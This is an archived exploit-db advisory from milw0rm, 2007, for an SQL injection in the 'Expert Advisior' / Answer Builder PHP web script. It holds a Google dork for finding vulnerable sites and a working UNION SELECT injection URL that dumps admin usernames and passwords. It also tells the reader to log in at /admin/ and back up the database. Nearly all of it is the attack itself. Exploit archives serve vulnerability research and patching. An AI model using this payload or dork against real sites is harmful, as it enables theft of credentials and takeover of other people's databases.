exploit-db-mirror/platforms/php/webapps/4189.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

30 lines
1 KiB
Text
Executable file

--==+================================================================================+==--
--==+ Expert Advisior SQL Injection Vulnerbility +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: intitle:"Answer Builder" Ask a question
DESCRIPTION:
pull out admin user/pass from the database
EXPLOITS:
http://server.com/Script_Path/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),9,10,11,12,13,14,15/**/FROM/**/admin/*
NOTE/TIP:
admin login is at /admin/ you can backup DB there.
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !
--==+================================================================================+==--
--==+ Expert Advisior SQL Injection Vulnerbility +==--
--==+================================================================================+==--
# milw0rm.com [2007-07-17]